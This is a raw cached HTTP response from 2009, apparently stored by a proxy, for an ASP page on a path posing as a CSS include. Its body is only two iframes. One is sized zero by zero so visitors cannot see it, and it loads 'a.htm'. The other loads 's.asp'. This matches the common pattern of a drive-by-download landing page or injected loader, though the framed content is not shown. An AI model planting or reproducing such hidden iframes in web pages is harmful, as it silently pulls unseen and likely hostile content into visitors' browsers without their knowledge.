HTTP/1.1 200 OK
Content-Length: 104
Date: Thu, 26 Feb 2009 06:12:08 GMT
Cache-Control: private
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACSCCAQD=HJKBIIHCFHLNEHHNFONPGJKB; path=/
X-Polipo-Location: http://www.jltao8.com/include/css/1.asp
X-Polipo-Date: Thu, 26 Feb 2009 06:22:43 GMT
X-Polipo-Access: Thu, 26 Feb 2009 06:32:40 GMT



<body>
	<iframe src="a.htm" width=0 height=0></iframe>
	<iframe src="s.asp"></iframe>
</body>

